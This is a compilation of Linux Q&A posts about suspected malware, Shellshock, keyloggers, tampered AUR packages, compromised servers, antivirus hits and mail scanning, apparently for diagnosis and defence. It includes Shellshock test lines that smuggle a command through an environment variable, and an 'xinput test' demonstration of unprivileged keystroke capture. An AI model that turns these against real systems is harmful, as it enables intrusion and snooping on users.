I am seeing some strange DNS queries. They have seemingly random mixed case coming from machines in my network. Is it possible I have malware? $ sudo tcpdump -n port 53 16:42:57.805038 192.168.5.134.47813 > 192.168.5.2.53: 27738+ A? Www.sApO.PT. (29) 16:42:57.826942 192.168.5.2.53 > 192.168.5.134.47813: 27738 1/0/0 A 213.13.146.142 (45) 16:43:02.813782 192.168.5.2.53 > 192.168.5.134.12193: 17076 1/0/0 A 213.13.146.142 (45) 16:43:06.232232 192.168.5.134.44055 > 192.168.5.2.53: 28471+ A? www.SaPo.pt. (29) 16:43:06.253887 192.168.5.2.53 > 192.168.5.134.44055: 28471 1/0/0 A 213.13.146.142 (45) 16:45:22.135751 192.168.5.134.11862 > 192.168.5.2.53: 48659+ A? wwW.cnn.COm. (29) 16:45:22.190254 192.168.5.2.53 > 192.168.5.134.11862: 48659 2/0/0 CNAME turner-tls.map.fastly.net., (84) 16:45:27.142154 192.168.5.134.34929 > 192.168.5.2.53: 25816+ A? wWw.cnN.com. (29) 16:45:27.168537 192.168.5.2.53 > 192.168.5.134.34929: 25816 2/0/0 CNAME turner-tls.map.fastly.net., (84) 16:45:32.150473 192.168.5.134.29932 > 192.168.5.2.53: 40674+ A? wWw.cnn.cOM. (29) 16:45:32.173422 192.168.5.2.53 > 192.168.5.134.29932: 40674 2/0/0 CNAME turner-tls.map.fastly.net., (84)
Mixed case DNS requests - Malware in my network?
BitcoinPlus is a web-based Bitcoin mining application written in Java. It uses your CPU to perform intensive calculations in an attempt to solve difficult math problems - this is part of the Bitcoin creation and security process. I've not heard of any *nix trojans or virii for Bitcoin generation (the only one I'm aware of is, ironically, MacOSX exclusive) but I have seen this site exploited to generate Bitcoins on public-access systems. It would be possible for a simple class of existing virii/trojans to launch this process hidden from view, so you may be dealing with a novel use for an old concept. You might try contacting BitcoinPlus to determine which user your communications are mapped to and perhaps determine the source of the problem - or at the very least get the exploiter's account locked/seized. If you need further Bitcoin-specific information or resources you could also ask at the Bitcoin StackExchange currently in public beta. Perhaps someone there knows something I don't.
I have a weird problem since about a week. When I wake up my computer from suspend, a java process starts and consumes about 170 % CPU capacity. I analyzed the java process a bit: it connects to static.icloud-ips.com. Here's a screenshot of what I found out: http://imageshack.us/photo/my-images/688/javavirus.png/ To solve this problem I deleted all files in ~/.java/deployment/cache/ but however, it seems like the file was recreated. Is this a virus? How can I solve this problem? I use Debian Wheezy x64 with Gnome 3.2
Java problem - nearly looks like a virus?
You have done it right. Your systems are secure and not vulnerable to this exploit. If your system were not secure, the output of the command would be:
vulnerable
this is a test
but since your output is
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for 'x'
this is a test
you are safe. If you did this yesterday, please consider running yum update bash today too, as the fix from yesterday is not as good as the one released today.
EDIT (as OP requested more information)
I can also reassure you about the newer vulnerability. Your system already has the new fix installed. If you had gotten the output
echo vuln
still vulnerable :(
you'd still be vulnerable. Now, I cannot give you an answer to how the exploit exactly works; by that I mean that I cannot tell you what exactly happens and what the differences are between the first and the second exploit. But I can give you a simplified answer to how the exploit works. The command
env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("
does nothing more than save a bit of executable code in an environment variable that will be executed every time you start a bash shell. And a bash shell is started easily and often, not only by yourself: a lot of programs need bash to do their work, like CGI for example. If you would like to have a deeper read about this exploit, here is a link to Red Hat's security blog: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
I am using Fedora 20 on two machines. Having read about the Shellshock vulnerability, just now at 1100ish UTC on September 26th 2014, in UK, after a yum update bash to protect against it, I tried this recommended testmodes: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"and, in both user and su modes, got this result on one machine: bash: warning: x: ignoring function definition attempt bash: error importing function definition for 'x' this is a testOn the other I got simply: this is a test Please: have I succeeded on both machines, or should I worry?In response to @terdon's comment I got this result: [Harry@localhost]~% env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :(" echo vuln cat: echo: No such file or directory [Harry@localhost]~%Not sure what it means, though.Just to make it clear, I am puzzled by the warning, and also the differences between the two machines. I have had another close look at the warning message. It might be that, on the machine without the error message, I entered the command with "copy and paste": on the other I typed it in and got the warning, and I now see that the warning quotes the final 'x' as `x' (note the "back tick"). That machine has an american keyboard that I cannot yet change to UK layout, but there is another question entirely. Pursuing this on the 'net this LinuxQuestions.org thread discusses it and it appears that both are safe.
Shellshock: Why this error when testing for vulnerability
I haven't watched the video, so I'm responding to the SU thread rather than the video it references. If an attacker can run code on your machine as your user, then they can log your key presses. Well, duh. All the applications you're running have access to your key presses. If you're typing stuff in your web browser, your web browser has access to your key presses. Ah, you say, but what about logging key presses in another application? As long as the other application is running on the same X server, they can still be logged. X11 doesn't attempt to isolate applications —that's not its job. X11 allows programs to define global shortcuts, which is useful for input methods, to define macros, etc. If the attacker can run code as your user, he can also read and modify your files, and cause all kinds of other harm. This is not a threat. It's part of the normal expectations of a working system. If you allow an attacker to run code on your machine, your machine isn't safe anymore. It's like if you open your front door and allow an axe murderer in: if you then get cleaved in two, it's not because your front door is insecure. SELinux is irrelevant here. SELinux attempts to contain unauthorized behavior, but after the initial exploit (which is not within SELinux's domain), everything is authorized behavior. The keylogger can only log keys pressed by the infected user. (At least as long as the infected user doesn't type the sudo password.)
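You can convince yourself of this without any malware at all: xinput, a standard X11 utility, will happily stream key events from any client running on the same display (the device id below is a placeholder you get from the listing):
xinput list                    # find the id of your keyboard device
xinput test <keyboard-id>      # prints press/release events for every key you type, wherever the focus is
That is exactly the kind of access an unprivileged keylogger uses, and it requires no root and no exploit.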
https://superuser.com/questions/301646/linux-keylogger-without-root-or-sudo-is-it-real
Or is that long gone, as most of the new distros implement SELinux by default?
Does this threat still exist: Linux keylogger without root privileges
The point is that it may not be so easy for an inexperienced user to check source code. However, as a natural counterpoint, it could also be argued that Arch Linux is not the best suited Linux distribution for inexperienced users. The Arch wiki(s), AUR helpers and most forums online warn about the dangers of such repositories/the AUR, and that they must not be blindly trusted. Some helpers also warn that you should read PKGBUILDs before installing them. As a recommendation, it is always advised to use trizen or aurman (or similar utilities) instead of yaourt (listed as problematic/discontinued), as they offer the user the opportunity to inspect packages/diff listings. It also helps to look at the history of contributions when picking up or updating packages. Casual users should not use these repositories as their main source of packages when official binary packages are available as an alternative. If you have to use the AUR, you can search the Arch forums and/or mailing lists for reports of problems. And, although it is an overly optimistic view, it seems the Arch community regularly inspects packages, as was the case here. You can also try to use maldetect to search downloaded source code for known malware signatures; however, the probability of catching something with custom-made code is nil, and maldetect is often better suited to catching malware in PHP code. P.S. In my last job, I used for a short while dhcpd packages compiled from source, and was using for years FreeRadius packages compiled from source (because the Debian version was obsolete). In the 1st case I did a cursory check of the source code from github the couple of times I downloaded it. In the 2nd case, I actively followed the FreeRadius user forum, github forum, and code updates. I also had a testing/quarantine environment. (I even managed to submit an important bug report found in my testing environment.) Getting to the point: if you are doing any serious work with source-installed packages, it usually involves much more work than using the official compiled packages offered by the distribution. P.S.2. Any seasoned Unix admin will tell you that running scripts/source code piped directly from curl without any kind of visual inspection is a very bad idea from the security point of view.
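For the manual route, the basic workflow is small enough to make inspection a habit rather than a chore (some-package is a placeholder):
git clone https://aur.archlinux.org/some-package.git
cd some-package
git log --oneline      # see who changed what, and when the package changed maintainers
less PKGBUILD          # look for curl/wget piped to sh, base64 blobs, unexpected URLs
less *.install         # install hooks run as root, so read them too if present
makepkg -sri           # build and install only once you are satisfied
The same applies after every update an AUR helper proposes, which is why helpers that show PKGBUILD diffs (trizen, aurman and similar) are recommended above.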
Malicious code has been found and deleted later from 3 AUR packages acroread, blaz and minergate (e,g: acroread PKGBUILD detail). It was found in a commit released by a malicious user by changing the owner of the orphaned AUR package and including a malicious curl command. The curl command will download the main bash script x then the second script u (u.sh) in order to create a systemd service and using a function to collect some system data (non sensitive data) but the scripts can be modified by the attacker to be uploaded sequentially. In practice not all users have the ability to check the PKGBUILD before building any package on their systems for some reasons (require some knowledge , take more time etc...). To understand how it work I have downloaded and uploaded the 2 bash scripts on this pastbin page. What is the easiest way to check an AUR package for malicious code? naked security : Another Linux community with malware woes Malicious Software Packages Found On Arch Linux User Repository
How to check an AUR package for malicious code?
Out of curiosity I found this page, where they discuss the analysis of a malware attack: http://remchp.com/blog/?p=52
About fake and fuck: attackers often load up tools to facilitate their work. About fake.cfg, there is indeed a utility in Linux called fake:
$ apt-cache search fake | grep ^fake
fake - IP address takeover tool
Fake is a utility that enables the IP address be taken over by bringing up a second interface on the host machine and using gratuitous arp. Designed to switch in backup servers on a LAN.
So I suspect fake could be a way of:
- evading firewall rules;
- reaching other networks;
- generating packets/spam using multiple IPs of your network at a time, to evade blacklists/fail2ban/Apache mod_evasive when attacking other servers on the Internet at large.
As for fuck, the objectives are less clear. I found this: https://github.com/nvbn/thefuck
Magnificent app which corrects your previous console command.
The fuck command uses rule substitution to run the previous command with modifications. I am supposing here that it is used as a basic tool to automate the attackers' work and to obfuscate, in the history and in any monitoring, some of the actual commands they run.
In addition to the debuggers that others have already mentioned, to follow up their activity I recommend using strace, sysdig or dtrace4linux. They are fantastic tools for following the nitty-gritty of kernel calls. To follow up on all files opened on the compromised host, you run:
sysdig -p "%12user.name %6proc.pid %12proc.name %3fd.num %fd.typechar %fd.name" evt.type=open
Snoop file opens as they occur (with sysdig)
From: http://www.sysdig.org/wiki/sysdig-examples/
Sysdig has the ability to show everything, including buffers of files being written, or data sent over the network. Needless to say, you should back up and isolate the server before running those commands.
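If sysdig is not available, strace can give a similar (much noisier) view of a single suspicious process; the PID below is of course just a placeholder:

strace -f -tt -e trace=execve,open,openat,connect -p <PID> -o /root/suspect.strace

-f follows child processes, -tt adds timestamps, and the -e filter keeps the output down to program executions, file opens and network connections.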
I am not asking what to do with an compromised box. Specifically, I am asking if anybody has experience with hack/malware amongst other files leaves files "/usr/bin/fake.cfg" and "/usr/bin/fuck". I can see in part what it is doing and how. I realize the most appropriate course of action is to disconnect from internet, salvage, rebuild. I am curious to learn more about this particular incursion. I do not often get hacked or find myself on compromised machines - that I have this opportunity I would like to turn it into a learning opportunity. Does anybody have and experience with this particular incursion? Any suggestions where I might look. A million years ago the FBI used to keep a useful database of this sort of thing. Since 911 it has become pretty useless. Ideas?
Compromised server with malware "/usr/bin/fuck" and "/usr/bin/fake.cfg"
With default settings, software in a Windows 7 guest would not be able to access keyboard input from outside of VirtualBox, such as in the host or in another running guest. Access to the host OS resources would have to be permitted explicitly in some way for the guest to gain that kind of control. However, human error can always sabotage the implicit security controls. Consider typing while the guest has accidentally been granted input focus, for example while you think you are typing into the host but the guest retained or regained control. This can happen to a non-observant user, or because of inadequate UI cues as to which environment currently has focus. For instance, control of the input could be handed to the VM by an inadvertent hotkey trigger without the user noticing. If the VirtualBox guest extensions have been installed, this could also occur by bumping the mouse or brushing the touchpad with focus-follows-mouse active. Once you move beyond the default settings, though, there are many potential gotchas that would compromise your host's security or a user's privacy by way of indirect keyboard input capture. For example:
depending on how the guest network has been set up, it could be possible to sniff the host's network traffic, thereby indirectly reading what you typed into Firefox's address bar;
if shared clipboard access has been enabled, the guest could read all information you copy to the host's clipboard.
If the question were expanded beyond guest keylogger access, there is a myriad of security issues that should be accounted for based on what resources you share.
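If you want to be sure the clipboard and drag-and-drop channels stay closed for a particular VM, something along these lines should work (the VM name is just an example, and the exact option spelling varies a little between VirtualBox versions):

VBoxManage modifyvm "Windows 7" --clipboard disabled --draganddrop disabled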
So, I have installed Windows 7 in Oracle's VirtualBox (5.0.8) and I would like to know if the Windows 7 software (including viruses and malware) is able in the default VirtualBox settings access the keyboard input outside of the VirtualBox. I mean, if, for example, a keylogger inside my Windows 7 VM is able to catch the keypresses in the Firefox installed on my default Xubuntu installation (host OS) that is running/hosting the VirtualBox.
Oracle's VirtualBox and keyloggers
Based on the details in your question, your system is clean.
You're making backups. OK.
clamav comes up clean. That's fine, too.
Based on your output of chkrootkit, your system is clean. Those files listed as suspicious are benign.
The Ebury/Windigo detection is a false positive: https://github.com/Magentron/chkrootkit/issues/1
Some of the live discs you tried didn't work. That's OK.
There might already be an updater running as a daemon.
You're trying to execute the log file. View it in a pager instead, like less /var/log/rkhunter.log.
From a logical standpoint, chkrootkit and rkhunter aren't of much use when they scan the same system they execute on: they are not realtime scanners, so any decently packaged rootkit would have sabotaged the scanners before they were run. Also, both have heuristics that result in plenty of false positives. Saved files not appearing is rarely an indication of system compromise, and without knowing the contents of the "suspicious" .txt file you mention, no conclusion can be drawn from that. DEADJOE is a backup file created by the JOE text editor. The firewall in Linux Mint is disabled by default.
Edit: Added info on DEADJOE file.
I think my Linux laptop has been hacked, for three reasons:Whenever I saved files into the Home folder, the files wouldn't appear - not even in the other folders on my computer. An unfamiliar .txt file has showed up in my Home folder. Having noticed it, I didn't open it. I immediately had a suspicion that maybe my laptop has been hacked. When checking my Firewall status, it turned out that it was inactive. Thus, I have taken the following steps:I backed-up all of my recent files using two USB Sticks that aren't as important as other USB Sticks which I own - so in case those USB Sticks get infected with the potential malware, it wouldn't infect my other backed-up important files. I've used ClamTK in order to scan the aforementioned suspicious file - but apparently, for some reason, it hasn't detected any threats. I've used chkrootkit for another scan. This is the output (up until that point, nothing seemed to have been infected): Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/python2.7/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/debug/.build-id /lib/modules/4.13.0-39-generic/vdso/.build-id /lib/modules/4.13.0-37-generic/vdso/.build-id /lib/modules/4.10.0-38-generic/vdso/.build-id /lib/modules/4.13.0-36-generic/vdso/.build-id /lib/modules/4.13.0-32-generic/vdso/.build-id /lib/modules/4.13.0-38-generic/vdso/.build-id /usr/lib/debug/.build-id /lib/modules/4.13.0-39-generic/vdso/.build-id /lib/modules/4.13.0-37-generic/vdso/.build-id /lib/modules/4.10.0-38-generic/vdso/.build-id /lib/modules/4.13.0-36-generic/vdso/.build-id /lib/modules/4.13.0-32-generic/vdso/.build-id /lib/modules/4.13.0-38-generic/vdso/.build-idAnd also: Searching for Linux/Ebury - Operation Windigo ssh... Possible Linux/Ebury - Operation Windigo installetdI was trying - twice - to scan my laptop with F-PROT, with fpscan, using Ultimate Boot CD. But when I tried getting into the PartedMagic section of the disc in order to use the tool, it just wouldn't work. Twice. So I was not able to use it whatsoever. When typing sudo freshclam, I got the following output: ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).Then, I scanned the computer using rkhunter. These are the warnings I got: /usr/bin/lwp-request [ Warning ] Performing filesystem checks Checking /dev for suspicious file types [ Warning ] Checking for hidden files and directories [ Warning ]And this is the summary: System checks summary =====================File properties checks... Files checked: 143 Suspect files: 1Rootkit checks... Rootkits checked : 365 Possible rootkits: 0Applications checks... All checks skippedThe system checks took: 1 minute and 10 secondsAll results have been written to the log file: /var/log/rkhunter.logOne or more warnings have been found while checking the system. Please check the log file (/var/log/rkhunter.log)So, after all that - I do not have access to the rkhunter log file as root: n-even@neven-Lenovo-ideapad-310-14ISK ~ $ sudo su neven-Lenovo-ideapad-310-14ISK n-even # /var/log/rkhunter.log bash: /var/log/rkhunter.log: Permission deniedWhat should I be doing now? Help much appreciated! Thanks a lot.
bash: /var/log/rkhunter.log: Permission denied (as root - Linux Mint 18.3)
There is a worm going around for an exim4 vulnerability in Debian: http://blog.bytemark.co.uk//2010/12/12/fresh-worm-food
Is there any virus attack on any of the current distributions of Linux? If there is, how was it solved? Did they use any of the antivirus programs which are available now?
Is there any Virus attack in Linux?
Make a copy of your mbox in Maildir format, for example using this Perl script or the terminal mail client mutt(1). Then clamscan that maildir: as each message is stored in a separate file in the Maildir format, you'll be able to identify the offending message and hence be able to remove it from your original mbox.
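A minimal sketch of the scan step, assuming the converted copy lives in ~/maildir-saved:

clamscan -ri ~/maildir-saved    # -r recurse into the cur/ and new/ subdirectories, -i print only infected files

Each hit names a single message file; open it in a pager or text editor to read its Subject, Date and attachment filename, which makes it easy to find and delete the corresponding message in Icedove.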
Today I ran a clamscan -ri / and got some positives for some malware. Most are in the "spam" folder, so that's no problem. But one is among my saved e-mails: /home/user/.icedove/bfa059u1.default/ImapMail/imap.server.com/INBOX.sbd/saved: Doc.Dropper.Agent-1552723 FOUND"Icedove" is Debian's rebranded Thunderbird. "saved" is the folder under the inbox that contains the message with the malware. Is there any way to get more info from Clamscan to find out the name of the attachment that contains the malware? How can I find out which particular e-mail that contains this program?Related posts: https://superuser.com/questions/107261
How to find out which particular e-mail in Thunderbird/Icedove that contains malware Doc.Dropper.Agent-1552723 pointed out by Clamscan?
If your system has been compromised at the root level, then the attacker can hide a keylogger from anything you try to detect it with - by linking in a custom kernel module that intercepts, at the kernel level, the system calls that might lead to its detection. If that's what you suspect has happened, your only way to be reasonably sure you'll find it is to boot from a known-safe live-CD image and manually scan for anything suspicious or out of place. Software like chkrootkit and debsums (the latter only applicable to Debian-based distros, obviously) will help.
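As a rough sketch, from the live environment you could mount the suspect root filesystem read-only and point the tools at it (the device name is an example, and debsums must already be installed on the target system):

sudo mount -o ro /dev/sda1 /mnt
sudo chkrootkit -r /mnt         # -r sets an alternate root directory to scan
sudo chroot /mnt debsums -s     # report installed Debian package files whose checksums changed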
There are HW/SW/whatever keyloggers out there. How do I find out? E.g.: regularly check the cable of the keyboard, because there could be HW keyloggers: https://i.sstatic.net/kgfbY.jpg But what about other HW keyloggers, or software keyloggers? [Using Linux, e.g. Fedora or Ubuntu, as the OS!] - How do I track keylogger software/solutions? What are the "best practices"?
How to find out that someone is using a Keylogger on the machine I am using?
will it be able to access data from Ubuntu and steal itYes, it can, e.g. if you use something like ext2fsd and have your Linux partitions mounted in Windows. Even if you don't mount anything, advanced malware could read your disks directly and search for certain patterns in disk images and extract necessary files but I doubt such malware even exists. Advanced malware may also modify UEFI firmware itself and UEFI system (boot) partition and stay resident even after Linux loads. The bottom line is: malware under Windows can do everything you can do. If you're worried about the safety of your data in Linux make sure your Windows partition is secure as well. If you're paranoid enough, delete Windows altogether.
I have installed Ubuntu 20.04 along with Windows 10 on my laptop. I use Windows for games and Ubuntu for work. I wonder if I download some virus on Windows, will it be able to access data from Ubuntu and steal it? By data from Ubuntu I mean for example my browsing history while I was on Ubuntu.
Can malware from Windows access Ubuntu files?
Use a file change audit mechanism such as LoggedFS or Linux's audit subsystem. See also How to determine which process is creating a file?, Log every invocation of every SUID program?, Stump the Chump with Auditd 01...
Assuming that the server is running Linux, the audit system looks like the best solution. Log all file renaming operations in the relevant directory tree, e.g. /var/www:
auditctl -a exit,always -S rename -F dir=/var/www
The audit logs are normally in /var/log/audit/audit.log. Here's a sample log from cd /var/www; mv foo bar with the rule above:
type=SYSCALL msg=audit(1489528471.598:669): arch=c000003e syscall=82 success=yes exit=0 a0=7ffd38079c14 a1=7ffd38079c18 a2=20 a3=7ffd38077940 items=4 ppid=5661 pid=5690 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts11 ses=1 comm="mv" exe="/bin/mv" key=(null)
type=CWD msg=audit(1489528471.598:669): cwd="/var/www"
type=PATH msg=audit(1489528471.598:669): item=0 name="/var/www" inode=22151424 dev=fc:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1489528471.598:669): item=1 name="/var/www" inode=22151424 dev=fc:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1489528471.598:669): item=2 name="foo" inode=22152394 dev=fc:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=DELETE
type=PATH msg=audit(1489528471.598:669): item=3 name="bar" inode=22152394 dev=fc:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE
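To make the events easier to pull back out later, you can attach a key to the rule and then query it with ausearch (the key name is just an example):

auditctl -a exit,always -S rename -S renameat -F dir=/var/www -k www-rename
ausearch -k www-rename -i    # -i translates uids and syscall numbers into readable names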
Related: https://serverfault.com/questions/748417/something-renames-files-to-filename-ext-suspected https://stackoverflow.com/questions/32835796/php-file-automatically-renamed-to-php-suspected I have a customer with a webhosting server that's running linux who is suffering from this problem. It is not a Wordpress site, although he does run Wordpress sites on that same server. We're both aware of the problem and that some of those files do indeed have malware content - however, there are also some false positives, and they are affecting the site's functioning (by rendering include files unreadable), so he's asking me to track down which part of the installed software is doing this and to put a stop to it. Trouble is, I'm not 100% sure what is causing the rename and why. I suspect clamav/amavis because it's in their purview, but nothing in cron really springs out to me as a possible cause for what appear to be weekly scans...
Something is renaming php files to .php.suspected; I'm trying to find out what
I think that the message Java.Exploit.CVE_2013_2472 FOUND means that this installer is for a version of Java affected by the security bug whose description you posted. If so, it's not a virus at all, just a piece of legitimate-but-dangerous software. I would say the message from ClamAV is a bit confusing, and the action of deleting the affected file may not be the most sensible, but that's open to debate.
I'm scanning one of my systems with Clamav like this: $ clamscan -r -i --remove --max-filesize=4000M --max-scansize=4000M \ --exclude=/proc --exclude=/sys --exclude=/dev --bytecode-timeout=190000It just found a virus in my download directory: /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Java.Exploit.CVE_2013_2472 FOUND /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Removed.What is the damage from this kind of malware? I downloaded this file from the official Oracle site, so I can't understand how it could be infected. Did someone manipulate this file before it entered my system and I installed some kind of malware on my Fedora? I removed the Java in question from my system and activated openjdk from the repository. Information from Oracle: Excerpt:CVE-2013-2472 Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: 2D). Supported versions that are affected are 7 Update 21 and before, 6 Update 45 and before and 5.0 Update 45 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized Operating System takeover including arbitrary code execution. Note: Applies to client deployment of Java only. This vulnerability can be exploited only through sandboxed Java Web Start applications and sandboxed Java applets. CVSS Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C). (legend) [Advisory]What are the procedures here, is this a Linux virus? Note "result in unauthorized Operating System takeover". EDIT #1 Here are the scan results: /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Java.Exploit.CVE_2013_2472 FOUND /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Removed. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: Unix.Trojan.MSShellcode-21 FOUND /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: Removed. ----------- SCAN SUMMARY ----------- Known viruses: 3791398 Engine version: 0.98.6 Scanned directories: 103265 Scanned files: 746031 Infected files: 2 Total errors: 18624 Data scanned: 330294.49 MB Data read: 367850.33 MB (ratio 0.90:1) Time: 33458.657 sec (557 m 38 s) 17 April 2015ClamAV is saying that there were two infections, according to @dhag this is not the case and one is an exploit/vulnerability in Java.... I am curious as to why frequently the scan is removing scripts from the nmap directory. I suspect that that's not malware but has to do with something about the capability of the script.
Exploit FOUND with clamav on Fedora 21 in Oracle's java
3 options, as I see it.
1 - Disable browser plugins
I would say that the primary threat from Java is that it can be invoked from the browser, so getting rid of the Java plugins in whichever browser you use would be the best option.
2 - Isolate Java - not on $PATH
Going further, if you know that various applications need Java, then putting it in a non-standard location would likely be the next best thing to do. Never adding it to your PATH would be part of this solution.
3 - Isolate Java to specific applications that require it
Lastly, you could opt to install Java only alongside the applications that require it, thereby relegating it to a very narrowly focused use, for specific applications and nothing more. This will increase your HDD usage, but then only this handful of applications will be able to use their dedicated copy of Java, and nothing else.
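If you also want the on/off switch the question asks for, a crude but workable sketch is to toggle the execute bit on the isolated JRE's launcher (the path below is just an example for a tarball install under /opt):

sudo chmod a-x /opt/jre1.8.0_31/bin/java    # "disable" Java
sudo chmod a+x /opt/jre1.8.0_31/bin/java    # re-enable it when the Arduino IDE needs it

Keep in mind this only stops that particular binary from being launched; it does nothing against software you deliberately run as root.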
For me Java is just a security threat. Not many legitimate Linux apps use Java. However there is an abundance in Java malware and malicious remote administration tools like Jrat among others. But one legitimate app I run like the "Arduino IDE" may unfortunately need Java. So, I want an option to enable or disable Java whenever I want without uninstalling it. I was thinking of denying Java permission to execute using chmod. Would this work? Is there a better alternative? Would moving Java from a "bin" folder work? Edit: I just realized that Java may be deeply integrated with the OS and chmod method may work for .jar files but may not actually work for all Java executables. Important: I am not talking about Java browser plugin. I'm talking about Java on my linux system. I chose linux because it didn't have many malicious rats and botnets like Darkcomet, Poison IVy, Zeus. However there are Java rats like Jrat. Which could be autostarting once I accidentally gave them root.
How do I disable and re-enable Java whenever I want?
I caught one of the PHP "droppers" in a WordPress-like honeypot. The attackers gained access by guessing a password - brute-force guessing, no exploits. The PHP itself is entirely ordinary: it does nothing out of the ordinary, it does not call eval, or preg_replace, or even base64_decode. There's really nothing you can do at the PHP level to guard against the code in the "dropper". If you can keep attackers from guessing your WordPress or Joomla or whatever password, keep your whatever up to date, and get lucky by not having any hackable plugins or 3rd-party code installed, you should be able to avoid Mayhem.
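That said, if you want a quick (and admittedly noisy) sweep of a web root for the obfuscation primitives that many other droppers do use, something like this is a reasonable starting point (the path is an example):

grep -RniE 'eval *\(|base64_decode *\(|gzinflate *\(|str_rot13 *\(' --include='*.php' /var/www/html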
How will making sure my PHP version is updated thwart the Mayhem Malware? Will updating PHP on my Ubuntu server prevent the Mayhem Malware from being able to make it onto the server, prevent it from running, or something else? Is there anything else I can do to safeguard against it? Edit: This is the most informational article I've found which describes Mayhem: https://www.virusbtn.com/virusbulletin/archive/2014/07/vb201407-Mayhem
Updating PHP to Guard Against Mayhem Malware
If I include Microsoft's keys in my secure boot setup, then any malware which has a Microsoft key can boot my Linux binary. Can I restrict my Linux binary to be booted only by a bootloader signed with my personal key?No. You misunderstand the chain of trust. Earlier things need to verify later things. Later things can't meaningfully verify earlier things.I know I can sign the binary itself with my personal key, but that doesn't prevent malware with a different key from booting my binary.Correct.If this is impossible, I can still sign the Windows binary with my own key and get rid of Microsoft's keys, right?Yes, and this is what you have to do if you don't want code signed by Microsoft's keys to run.
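For that last point, the usual tool is sbsign from sbsigntools; a rough sketch, assuming you have already generated and enrolled your own db key pair (all file names are examples):

sbsign --key db.key --cert db.crt \
       --output /boot/efi/EFI/Microsoft/Boot/bootmgfw.signed.efi \
       /boot/efi/EFI/Microsoft/Boot/bootmgfw.efi

Once you have confirmed the re-signed copy boots, you can drop Microsoft's certificates from db so that only binaries signed with your own key are accepted.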
If I include Microsoft's keys in my secure boot setup, then any malware which has a Microsoft key can boot my Linux binary. Can I restrict my Linux binary to be booted only by a bootloader signed with my personal key? I know I can sign the binary itself with my personal key, but that doesn't prevent malware with a different key from booting my binary. If this is impossible, I can still sign the Windows binary with my own key and get rid of Microsoft's keys, right?
Can I require binary X to be booted only by a bootloader signed with key Y?
First go to the archive folder, then run this:
find . -type f | awk -F'.' '{if ($3 != "" && $4 != ""){system("mv \"" $0 "\" \"./" $2 "." $3 "\"")}}'
This looks at every file in the folder and its subfolders, and if it finds that a file has two extensions it renames it with just the first extension. The quoting around the mv arguments is there so that file names containing spaces survive the rename. For example, the folder before the command:
.
./lolo.doc
./soso
./soso/jojo.doc.koko.momo
./kokooiko.doc.soso
./jojo.doc.koko
The folder after the command:
.
./lolo.doc
./kokooiko.doc
./jojo.doc
./soso
./soso/jojo.doc
I'm trying to recover some files from a Windows archive affected by a "stupid" Crypt0L0cker ransomware. In fact, after a quick check moving files to my own system, it seems that the malware just added a second, random, extension to the files (yeah, I know that "extension" doesn't really mean anything). Renaming the files manually just works: "List for 2016.doc.irolox" -> manually rename to -> "List for 2016.doc". I would like some tips to run this workflow:
loop recursively through all subdirectories of a given folder;
files contain spaces in their names (but they don't contain dots in the real name);
some files seem not to be affected. Rule: don't consider them if they just have ONE "extension" (so if 2 dots are detected -> file is affected);
rename files removing the last "extension".
Any tip to achieve this result?
Remove recursively double extension added by "stupid" Crypt0L0cker ransomware
Nothing would happen, since a .exe file is meant for Windows, not Linux; without Wine installed, and without an association to run .exe files from your mail client, these files are essentially of no consequence to you. Still, as a best practice you should typically never run things directly from email. You should instead get in the habit of doing a "Save As..." and then inspecting the file using tools such as file to confirm the file is what it's labeled as.
Example
$ file <name of file>
If it looks clean then go ahead and open it.
Scanning for malware
If you're genuinely serious about scanning email for viruses/malware then there are a few tools and techniques I've used over the years. Before I get into it I'll suggest just punting and using GMail instead. They do a fantastic job, and you can use fetchmail to download all the mail from GMail and still use mutt to read and send emails. If on the other hand you're "into" doing everything yourself, you can use these tools from mutt. For starters you can use spamassassin to scan incoming email. A procmail recipe such as this will run all incoming messages through spamassassin:
:0fw
| spamassassin -P
:0e
EXITCODE=$?
You can also use a spam detection network to scan and flag emails from mutt using Vipul's Razor.
Vipul's Razor is a distributed, collaborative, spam detection and filtering network. Through user contribution, Razor establishes a distributed and constantly updating catalogue of spam in propagation that is consulted by email clients to filter out known spam. Detection is done with statistical and randomized signatures that efficiently spot mutating spam content. User input is validated through reputation assignments based on consensus on report and revoke assertions which in turn is used for computing confidence values associated with individual signatures.
NOTE: Setting both of these up is covered in this tutorial, titled: Spam-Fighting Tricks.
Mail servers
If you're really a masochist you can run your own mail server (I do this, using sendmail). With your own mail server you have an even larger arsenal of tools available, such as:
spamassassin
milter-greylist
GeoIP
clamav
spamassassin-milter
clamav-milter
SPF
The above tools range from using online databases of emails that are known to be malware related, to blocking emails based on the geographic IP address that sent them, to using DNS rules via SPF (Sender Policy Framework). These solutions are what I would consider more enterprise grade; they work very well, but require a fair amount of time and knowledge to set up and to tend to afterwards.
References
How to Setup a Mail Server on CentOS 5
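Tying this back to the original question, a minimal sketch of the safe-inspection step (the file name and quarantine directory are just examples):

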